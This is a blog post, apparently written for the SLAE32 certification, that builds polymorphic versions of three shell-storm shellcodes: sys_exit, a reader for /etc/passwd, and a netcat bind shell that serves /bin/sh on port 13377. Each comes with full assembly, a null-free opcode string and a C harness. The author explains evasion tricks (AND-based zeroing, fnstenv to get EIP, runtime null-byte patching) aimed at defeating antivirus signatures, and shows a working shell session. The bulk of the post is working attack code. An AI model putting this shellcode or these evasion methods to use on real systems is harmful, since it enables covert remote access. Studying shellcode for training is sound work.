SLAE32 Assignment 6 - Polymorphic Shellcode

SLAE32

This post introduces the 6th mission of my SLAE32 journey.

If the previous assignment was cool, this one was even cooler because I could apply what I learned in the Msfvenom analysis assignment to develop polymorphic versions of existing shellcode.

There are some existing tools, such as ADMutate, that will XOR-encrypt existing shellcode and attach loader code to it. This is definitely useful, but writing polymorphic shellcode without a tool is a much better learning experience.

Introduction

The task of the 6th SLAE32 assignment is to select 3 shellcode payloads from shell-storm and create polymorphic versions of them without increasing the size of the shellcode by more than 50%.

Bonus points if we can make it shorter in length than the original.

Shellcode 1 - sys_exit(0)

This shellcode was written by gunslinger_, and is located here. This shellcode only calls exit() with 0 as exit code.

Size: 8 bytes

/*
Name   : 8 bytes sys_exit(0) x86 linux shellcode
Date   : may, 31 2010
Author : gunslinger_
Web    : devilzc0de.com
blog   : gunslinger.devilzc0de.com
tested on : linux debian
*/

char *bye=
 "\x31\xc0"                    /* xor    %eax,%eax */
 "\xb0\x01"                    /* mov    $0x1,%al */
 "\x31\xdb"                    /* xor    %ebx,%ebx */
 "\xcd\x80";                   /* int    $0x80 */

int main(void)
{
		((void (*)(void)) bye)();
		return 0;
}

The code is very short, so there are few alternatives to work with.

global _start

section .text
_start:

xor ebx, ebx    ; clear ebx (exit status 0)
mul ebx         ; eax * ebx = 0, which clears eax and edx
inc eax         ; eax = 1, the exit syscall number
syscall         ; 0f 05, used here in place of int 0x80 (cd 80)

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ../../../../assembler.sh 7-byte-poly_sys_exit.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 7

"\x31\xdb\xf7\xe3\x40\x0f\x05"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xdb\xf7\xe3\x40\x0f\x05";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 7

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/sys_exit(0)-shellcode-623/poly ‹main●› 
╰─$ echo $?
0

Size: 7 bytes

One byte shorter, a 12.5% reduction in size compared to the original.

Shellcode 2 - cat passwd Shellcode

This shellcode was written by fb1h2s, and is located here. This shellcode will read the /etc/passwd file.

Size: 43 bytes

#include <stdio.h>
 
const char shellcode[]="\x31\xc0" // xorl %eax,%eax
"\x99" // cdq
"\x52" // push edx
"\x68\x2f\x63\x61\x74" // push dword 0x7461632f
"\x68\x2f\x62\x69\x6e" // push dword 0x6e69622f
"\x89\xe3" // mov ebx,esp
"\x52" // push edx
"\x68\x73\x73\x77\x64" // pu sh dword 0x64777373
"\x68\x2f\x2f\x70\x61" // push dword 0x61702f2f
"\x68\x2f\x65\x74\x63" // push dword 0x6374652f
"\x89\xe1" // mov ecx,esp
"\xb0\x0b" // mov $0xb,%al
"\x52" // push edx
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx,esp
"\xcd\x80" ; // int 80h
 
int main()
{
(*(void (*)()) shellcode)();
 
return 0;
}
 
 
/*
shellcode[]=	"\x31\xc0\x99\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x89\xe3\x52\x68\x73\x73\x77\x64" 
		"\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x89\xe1\xb0\x0b\x52\x51\x53\x89\xe1\xcd\x80";
*/

We will use the assembly comments to understand what the code is doing. It appears to use some tricks we already used in past assignments, so we’ll just add junk instructions to change the code a bit.


global _start
section .text
_start:
        mov eax, -1             ; put 0xffffffff in eax
        inc eax                 ; eax wraps around to zero
        cdq                     ; zeroes edx
        lea ebx, [esp-0xc]      ; ebx = where "/bin/cat" will sit after the next 3 pushes
        push edx
        push dword 0x7461632f   ; tac/
        push dword 0x6e69622f   ; nib/

        lea ecx, [ebx-0x10]     ; use ebx as our "stack pointer": ecx = where the file path will sit

        push edx
        push dword 0x64777374   ; dwst - changes an 's' for a 't'
        push dword 0x61702f2f   ; ap//
        push dword 0x6374652f   ; cte/

        mov ax, 0x4a2f          ; first operand of the AND trick

        push edx
        xor byte [esp+0xc], 0x7 ; replacing the 't' with an 's'
        push ecx
        push ebx
        mov ecx, esp
        and ax, 0x358b          ; ax becomes 0xb - AND clears the rest of ax without null bytes
        int 0x80

At the beginning of the code, eax and edx both end up zeroed. A few instructions later, we push /etc//patswd instead of /etc//passwd and later replace the t with an s at runtime.

The coolest trick here is the use of AND operations to zero eax. It was a really cool challenge because it is an alternative to XOR operations. With suitable operands, and eax, imm32 assembles into bytes in the printable ASCII range (0x20 to 0x7e), whereas xor eax, eax (31 c0) does not.

Some buffers don’t allow unprintable characters. This way we can exploit what was previously unexploitable.

Let’s use an example to show how it works.

ASCII Printable Polymorphic Shellcode

The AND logic table transforms bits as follows:

1 and 1 = 1
0 and 0 = 0
1 and 0 = 0
0 and 1 = 0

Because the only case where the end result is a 1 is when both bits are 1, if two inverse values are ANDed onto EAX, EAX will become zero.

Binary                                Hexadecimal
    1000101010011100100111101001010       0x454e4f4a
AND 0111010001100010011000000110101   AND 0x3a313035
------------------------------------  ---------------
    0000000000000000000000000000000       0x00000000

This technique uses two printable 32-bit values that have no set bits in common (each byte pair above is complementary in its low 7 bits), so ANDing both onto eax always leaves zero.

What’s the advantage?

eax can be zeroed without using null bytes, and the resulting assembled machine code is printable text.

From https://www.dmi.unipg.it/~bista/didattica/sicurezza-pg/buffer-overrun/hacking-book/0x2a0-writing_shellcode.html

Getting back to our exercise, let’s use our code to demonstrate how we leverage this technique to our purpose.

The instructions used with this technique are:

mov ax, 0x4a2f
and ax, 0x358b

The main goal is for eax to become 0xb (the execve syscall number). Let’s see below why we used these values for the AND operation and what the result is.

Binary                    Hexadecimal
    0100 1010 0010 1111       0x4a2f
AND 0011 0101 1000 1011   AND 0x358b
-----------------------  -------------
    0000 0000 0000 1011       0x000b

These two values share no set bits in the high 8 bits, so that byte becomes zero, while the low 8 bits AND to 0xb, the execve syscall number.

Would an antivirus or a human be able to spot this just by looking at it?

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ../../../assembler.sh cat_passwd.nasm                              

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 61

"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xb8\xff\xff\xff\xff\x40\x99\x8d\x5c\x24\xf4\x52\x68\x2f\x63\x61\x74\x68\x2f\x62\x69\x6e\x8d\x4b\xf0\x52\x68\x74\x73\x77\x64\x68\x2f\x2f\x70\x61\x68\x2f\x65\x74\x63\x66\xb8\x2f\x4a\x52\x80\x74\x24\x0c\x07\x51\x53\x89\xe1\x66\x25\x8b\x35\xcd\x80";

main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:7:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/cat_passwd-shellcode-571 ‹main●› 
╰─$ ./shellcode 
Shellcode Length: 61
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
dnsmasq:x:105:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
usbmux:x:106:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
rtkit:x:107:113:RealtimeKit,,,:/proc:/usr/sbin/nologin
pulse:x:108:117:PulseAudio daemon,,,:/var/run/pulse:/usr/sbin/nologin
speech-dispatcher:x:109:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
avahi:x:110:119:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/usr/sbin/nologin
saned:x:111:120::/var/lib/saned:/usr/sbin/nologin
colord:x:112:121:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin
hplip:x:113:7:HPLIP system user,,,:/var/run/hplip:/bin/false
lightdm:x:114:122:Light Display Manager:/var/lib/lightdm:/bin/false
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin
edu:x:1000:1000:edu:/home/edu:/usr/bin/zsh

Size: 61 bytes

An increase of 18 bytes, or 41.9%.

Shellcode 3 - nc -lvve/bin/sh -p13377

This was by far the most challenging exercise I had during the course.

At some point it became personal: I was determined to apply the techniques I learned in the msfvenom shellcode analysis assignment to this exercise, and nothing seemed to work at all.

One constraint I had to work around was that I had generated the msfvenom shellcodes with null bytes.

This time I couldn’t use null bytes, so I needed to review how msfvenom generates null-free shellcode and tried to apply that methodology to this task.

So I will present two polymorphic versions of this shellcode: one with null bytes and one null-free.

Then we can compare the differences between them and reflect on how hard it is to develop null-free shellcode.

The following quote captures the mindset we need to not give up when facing a complex problem, and sums up how difficult it was for me to get this working.

  Intelligence is the ability to adapt to change,
                                                by Stephen Hawking

After this, let’s get to the point.

This shellcode was written by an Anonymous user, and is located here. As the shellcode description says, this shellcode will listen on port 13377 using netcat and give /bin/sh to the connecting attacker.

The original shellcode does not have any comments, so I added some to make its internals easier to understand.

Size: 64 bytes (0x8048060 to 0x804809f in the objdump listing below)

linux x86 nc -lvve/bin/sh -p13377 shellcode
This shellcode will listen on port 13377 using netcat and give /bin/sh to connecting attacker
Author: Anonymous
Site: http://chaossecurity.wordpress.com/
Here is code written in NASM
/////////////////////////////
section .text
    global _start
_start:
xor eax,eax
xor edx,edx
push 0x37373333	; 7733
push 0x3170762d	; 1pv-
mov edx, esp
push eax
push 0x68732f6e	; hs/n
push 0x69622f65	; ib/e
push 0x76766c2d	; vvl-
mov ecx,esp
push eax
push 0x636e2f2f	; cn//
push 0x2f2f2f2f	; ////
push 0x6e69622f	; nib/
mov ebx, esp
push eax
push edx
push ecx
push ebx
xor edx,edx
mov  ecx,esp
mov al,11		; execve syscall
int 0x80
//////////////////////////////////
And here is objdump from which you can see the shellcode
//////////////////////////////////
teo@teo-desktop ~ $ objdump -d a.out
a.out:     file format elf32-i386
Disassembly of section .text:
08048060 <.text>:
 8048060:   31 c0                   xor    %eax,%eax
 8048062:   31 d2                   xor    %edx,%edx
 8048064:   68 33 33 37 37          push   $0x37373333
 8048069:   68 2d 76 70 31          push   $0x3170762d
 804806e:   89 e2                   mov    %esp,%edx
 8048070:   50                      push   %eax
 8048071:   68 6e 2f 73 68          push   $0x68732f6e
 8048076:   68 65 2f 62 69          push   $0x69622f65
 804807b:   68 2d 6c 76 76          push   $0x76766c2d
 8048080:   89 e1                   mov    %esp,%ecx
 8048082:   50                      push   %eax
 8048083:   68 2f 2f 6e 63          push   $0x636e2f2f
 8048088:   68 2f 2f 2f 2f          push   $0x2f2f2f2f
 804808d:   68 2f 62 69 6e          push   $0x6e69622f
 8048092:   89 e3                   mov    %esp,%ebx
 8048094:   50                      push   %eax
 8048095:   52                      push   %edx
 8048096:   51                      push   %ecx
 8048097:   53                      push   %ebx
 8048098:   31 d2                   xor    %edx,%edx
 804809a:   89 e1                   mov    %esp,%ecx
 804809c:   b0 0b                   mov    $0xb,%al
 804809e:   cd 80                   int    $0x80

As I said above, I took a completely different approach for this exercise than for the others.

The inspiration was the methodology used by the previously analyzed msfvenom shellcodes.

I will present the shellcode with null bytes first.

Null Byte Shellcode

xor eax, eax
cdq

call $+ 0xf
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx

call $ + 0x13
sub   eax,0x6576766c
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
add    byte [eax], al
pop ecx

call $ + 0x12
das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],ax
pop ebx

push eax
push edx
push ecx
push ebx

mov eax, 0x454e4a2f
;add ax, 0x1000

xor edx,edx
mov  ecx,esp
and eax,0x3a31358b
int 0x80

Let’s divide and conquer one more time.

The code is divided into parts, one for each argument of the command to be executed by execve.

Each part is delimited by a call and a pop instruction. The instructions inside each part are used to prepare an argument. The call pushes the address of the argument bytes onto the stack, and the pop $Register instruction moves that address from the stack into the register that corresponds to the position of the argument we are dealing with.

4th argument - pop edx
3rd argument - pop ecx
2nd argument - pop ebx
1st argument - pop eax

So the pop instruction tells us which execve argument is being prepared. It is the same process used to set up any syscall, but with obfuscated code.

For example:

xor eax, eax            
cdq                     

call $+ 0xf				; Start
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al
pop edx					; end

call $+0xf tells us we are looking at a “piece” of code that prepares the 4th argument, because this part ends with pop edx.

Between these two instructions there appear to be nonsensical assembly instructions that the CPU will execute, but this is not the case: the call jumps over them, so they are never executed and serve only as data.

By this time, you should be familiar with the x86 calling conventions and how call instruction behaves.

Just a reminder, the call instruction pushes the return address (address immediately after the call instruction) on the stack and it changes eip to the call destination. This effectively transfers control to the call target and begins execution there.

So what are these instructions doing exactly?

xor eax, eax            ; zeroes eax
cdq                     ; zeroes edx (saves space)

call $ + 0xf				; jumps to pop edx
sub  eax,0x33317076
xor  esi,DWORD [edi]
aaa
add  byte [eax], al     
pop edx             	; saving execve 4th argument

First, we clear the eax and edx registers. Then we use call to save the address of the next instruction and jump to the pop edx instruction.

Why $ + 0xf?

Well, the $ holds the address of the current instruction. As an example, let’s use the above code and compare the disassembled output with objdump -M intel -d netcat_nullbyte_shellcode

xor eax, eax
cdq

call $+ 0xf             ; $ holds address of call opcode
sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
add    byte [eax], al
pop edx
---
08049000 <_start>:
 8049000:       31 c0                   xor    eax,eax
 8049002:       99                      cdq    
 8049003:       e8 0a 00 00 00          call   8049012 <_start+0x12>
 8049008:       2d 76 70 31 33          sub    eax,0x33317076
 804900d:       33 37                   xor    esi,DWORD PTR [edi]
 804900f:       37                      aaa    
 8049010:       00 00                   add    BYTE PTR [eax],al
 8049012:       5a                      pop    edx

Checking the opcodes (2nd column), there is a distance of 15 bytes (0xf) between the call instruction and pop edx.

Note how the call instruction introduces null bytes when it redirects execution to a nearby target: the 32-bit relative displacement 0xa is encoded as 0a 00 00 00.

So edx ends up pointing to the same bytes as in the original shellcode, but they get there differently. Instead of using push instructions to put the bytes on the stack (Approach 1), we embed them directly in the code (Approach 2).

Approach 1

; Don't forget these are stored in little-endian order

push 0x37373333
push 0x3170762d

Approach 2

We place the exact same bytes as opcodes in the code and put the address of the first byte in edx

2d 76 70 31 33          sub    eax,0x33317076
33 37                   xor    esi,DWORD PTR [edi]
37                      aaa
00 00                   add    BYTE PTR [eax],al

Hex bytes: 0x2D, 0x76, 0x70, 0x31, 0x33, 0x33, 0x37, 0x37, 0x00, 0x00

Comparing both approaches we see they have the same exact bytes. We can check this with gdb

Approach 2 opcodes

Approach 2 has the disadvantage of introducing null bytes because we need to mark the end of the string explicitly, while with Approach 1 we just push a zeroed register, which does not introduce null bytes.

This is the main reason I struggled with Approach 2 and why I needed to rethink and completely change my approach to avoid null bytes.

Null Byte Free Shellcode


xor eax,eax

mov al, 0x8
fnop
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; nops will be changed to nulls in runtime

lea edx, [esi+4]

mov al, 0xc
fnop
jmp short argParser

sub   eax,0x6576766c    ; \xe8\x0e\x00\x00\x00
das
bound  ebp, [ecx+0x6e]
das
jae $+0x6a
nop


lea ecx, [esi+4]

;call $ + 0x12   ;\xe8\x0d\x00\x00\x00

mov al, 0xc
fnop
jmp short argParser

das
bound  ebp, [ecx+0x6e]
das
das
das
das
das
das
outsb
arpl word [eax],bx

lea ebx, [esi+4]

push eax
push edx
push ecx
push ebx

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb
int 0x80

argParser:          ; similar to jmp-call-pop, but patches the placeholder byte to null first,
                    ; assuming al holds the right distance
    fnstenv [esp-0xc]
    pop esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

The idea is the same as Approach 2 from the null byte shellcode, but it uses the fnstenv technique from the x87 FPU to obtain the address of an FPU instruction instead of using call. This technique was mentioned during the course, but understanding how to use it required research on our own.

To get the shellcode working with this technique, the logic had to be completely redesigned.

The FNSTENV Technique

There are alternative methods in shellcode for finding the value of the EIP register using instructions that contain no null bytes. One of those methods uses an FPU instruction.

The image below, from the FPU section of Intel’s manual, shows how the FPU environment is laid out in memory.

FNSTENV

When fnstenv is preceded by some other FPU instruction (in our case, fnop), it writes the FPU environment to its memory operand, and one field of that environment, the FPU instruction pointer (FIP) at offset 0xc, holds the address of the previous FPU instruction. By storing the environment at [esp-0xc], the FIP field lands exactly at the top of the stack, ready to be popped.

For this exercise I used the fnop instruction. fldz or another FPU instruction can be used too; just make sure it is an FPU instruction.

PoC code with fnstenv

l1: fnop
  fnstenv [esp-0xc]  ; FPU Instruction Pointer (FIP)
  pop eax
l2: ...

The result of the above two FPU instructions is that the address of the fnop instruction gets saved onto the stack.

When l2 is reached, the value in the eax register is the address of l1.

Debugging fnstenv

Debugging the code with the fnstenv technique was maddening.

I figured out that single-stepping over the fnop instruction results in a completely different value in the register that receives the FIP (eax in the PoC above). This means the behaviour of the code can be altered in a very subtle way.

So, the solution was to place one breakpoint on fnop and another on the instruction after fnstenv. In our code, that is pop esi.

mov al, 0x8
fnop                                ; breakpoint here
jmp short argParser
[...]
argParser:          

    fnstenv [esp-0xc]
    pop esi                         ; breakpoint here
    mov byte [esi + 0x4 + eax], ah 
    lea edi, [esi + 0x4+eax+0x1]
    xor eax,eax
    jmp edi

Between these instructions I executed the program normally to avoid the unstable behaviour fnstenv causes when performing single-step debugging.

Debug section taken from VirtualPC-specific section in https://www.virusbulletin.com/virusbulletin/2010/11/anti-unpacker-tricks-part-fourteen

Methodology

As with the previous shellcode, the code is divided into parts, one for each argument of the command to be executed by execve.

This time, each part is delimited by mov, fnop and jmp instructions at the start and a lea instruction at the end. The instructions inside each part are used to prepare one of execve’s arguments.

The mov, fnop and jmp instructions prepare the environment to obtain the EIP address and to store the bytes in the register related to the execve argument.

The lea $REGISTER, [esi+4] instruction loads the address of the argument bytes (esi+4) into the register that corresponds to the position of the argument we are dealing with.

So the lea instruction tells us which execve argument is being prepared.

Let’s take the “piece” of code for one of the arguments from our shellcode and dig into it.

We’ll be analyzing what we put in the edx register.

; start of edx section argument
mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction whose address is recorded as the FPU instruction pointer (FIP)
jmp short argParser

sub    eax,0x33317076
xor    esi,DWORD [edi]
aaa
nop                     ; avoid null byte. changed in runtime to null

lea edx, [esi+4]
; end of edx section argument
;----------------------------------------
; starting preparing next argument
mov al, 0xc

[...]

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First, we move into al the distance from the first byte of the argument to be placed in edx to the nop instruction. We don’t count the fnop and jmp opcodes because they take the same 4 bytes in every argument section, so the argParser branch accounts for them with the constant 0x4.

We can use objdump to verify that the distance between sub eax,0x33317076 and nop is 8 bytes.


8049004:       d9 d0                   fnop
8049006:       eb 43                   jmp    804904b <argParser>
8049008:       2d 76 70 31 33          sub    eax,0x33317076
804900d:       33 37                   xor    esi,DWORD PTR [edi]
804900f:       37                      aaa
8049010:       90                      nop

0x8049010 - 0x8049008 = 0x8 bytes

Then we execute an FPU instruction (fnop) so that the FPU records its address as the FPU instruction pointer. This address will be the reference for our further actions. Next, we jump to the argParser branch.

mov al, 0x8             ; distance from sub to nop
fnop                    ; FPU instruction whose address is recorded as the FPU instruction pointer (FIP)
jmp short argParser

In this branch is where all the magic happens.

argParser:          
                    
    fnstenv [esp-0xc]              ; Storing fnop address onto the stack
    pop esi                        ; put stored FIP address in esi
    mov byte [esi + 0x4 + eax], ah ; null-byte decoder --> change nop to null
    lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction
    xor eax,eax                    ; zeroed eax before executing next argument section
    jmp edi                        ; jump to instruction lea edx, [esi+4]

First we store the fnop address on the stack and pop that address into the esi register.

Then, remember that nop (0x90) byte we put at the end of the argument section?

We need a null byte at the end, but we can’t put it there explicitly. So we change it to a null byte at runtime with the following single instruction:

mov byte [esi + 0x4 + eax], ah  ; ah is always zero

Basically, we move ah, the 8 most significant bits of ax, to the address of the nop byte. We know ah is always zero because eax is cleared with xor eax, eax both at the beginning of the shellcode and at the end of the argParser branch, and each argument section only writes to al. So ah is never touched during our operations.

This way a null byte is placed at the end of the argument bytes, marking the end of the string.

Let’s demonstrate it in gdb

Null-byte decoder

After changing 0x90 to 0x00, three new instructions appeared.

Null-byte

That null byte also changed how the fnstenv instruction is displayed. What a simple thing can do, right?

After performing this operation we need to store the argument address in edx. Basically, we need to jump to the lea edx, [esi+4] instruction.

Our code does this by loading the address of that lea into edi: it starts from esi, which holds the address of the fnop instruction, adds the distance from fnop to the former nop byte (0x4 + eax), and adds 1 more byte to reach lea edx, [esi+4].

lea edi, [esi + 0x4+eax+0x1]   ; load the address of lea edx, [esi+4] instruction

The trickiest part is done. We just need to clear eax to prepare for the next argument section and jump, via edi, to the instruction that puts the argument address in edx.

xor eax,eax                    ; zeroed eax before executing next argument section
jmp edi                        ; jump to instruction lea edx, [esi+4]

Then the same process repeats for the other arguments.

We end our shellcode by calling execve with the usual process.

push eax        ; 0x0
push edx        ; -vp13377
push ecx        ; -lvve/bin/sh
push ebx        ; /bin//////nc

cdq             ; clear edx because is one of execve's arguments --> char *const envp[]
mov  ecx,esp
mov al, 0xb     ; execve syscall
int 0x80

Checking assembler.sh output

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ../../../../assembler.sh poly_netcat.nasm

[*] Compiling with NASM
[*] Linking
[*] Extracting opcodes
[*] Done


Shellcode size: 92

"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7"

--------------------
[*] Hack the World!
--------------------

No null bytes appear in the shellcode. We are good to go and paste the shellcode to our shellcode.c program

#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\x31\xc0\xb0\x08\xd9\xd0\xeb\x43\x2d\x76\x70\x31\x33\x33\x37\x37\x90\x8d\x56\x04\xb0\x0c\xd9\xd0"
"\xeb\x31\x2d\x6c\x76\x76\x65\x2f\x62\x69\x6e\x2f\x73\x68\x90\x8d\x4e\x04\xb0\x0c\xd9\xd0\xeb\x1b"
"\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x2f\x2f\x6e\x63\x18\x8d\x5e\x04\x50\x52\x51\x53\x99\x89\xe1\xb0\x0b"
"\xcd\x80\xd9\x74\x24\xf4\x5e\x88\x64\x06\x04\x8d\x7c\x30\x05\x31\xc0\xff\xe7";


main() {

	printf("Shellcode Length: %d\n", strlen(code));
	int (*ret)() = (int(*)())code;

	ret();

}

Compiling with gcc and executing it

╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ gcc -fno-stack-protector -m32 -z execstack -o shellcode shellcode.c
shellcode.c:11:1: warning: return type defaults to ‘int’ [-Wimplicit-int]
 main() {
 ^~~~
╭─edu@debian ~/Desktop/slae_x86/assignments/6-Polymorphic-Shellcode/netcat-shellcode-804/poly ‹main●› 
╰─$ ./shellcode
Shellcode Length: 92
listening on [any] 13377 ...
connect to [127.0.0.1] from localhost [127.0.0.1] 41344

-----------

╭─edu@debian ~/Desktop/slae_x86/assignments ‹main●› 
╰─$ nc -nv 127.0.0.1 13377
(UNKNOWN) [127.0.0.1] 13377 (?) open
id
uid=1000(edu) gid=1000(edu) groups=1000(edu),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth),115(lpadmin),116(scanner)
ls
poly_netcat
poly_netcat.nasm
poly_netcat.o
shellcode
shellcode.c

Size: 92 bytes

After some tuning we have a 92-byte polymorphic shellcode: an increase of 28 bytes over the 64 bytes of the original listing, which corresponds to 43.75%.

A curious Note

After getting this shellcode to work, I checked how shikata_ga_nai encodes shellcode.

shikata_ga_nai

It appears to have some similarities to what I have done :)

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification: http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/

Student ID: PA-31319

All the source code files are available on GitHub at https://github.com/0xnibbles/slae_x86
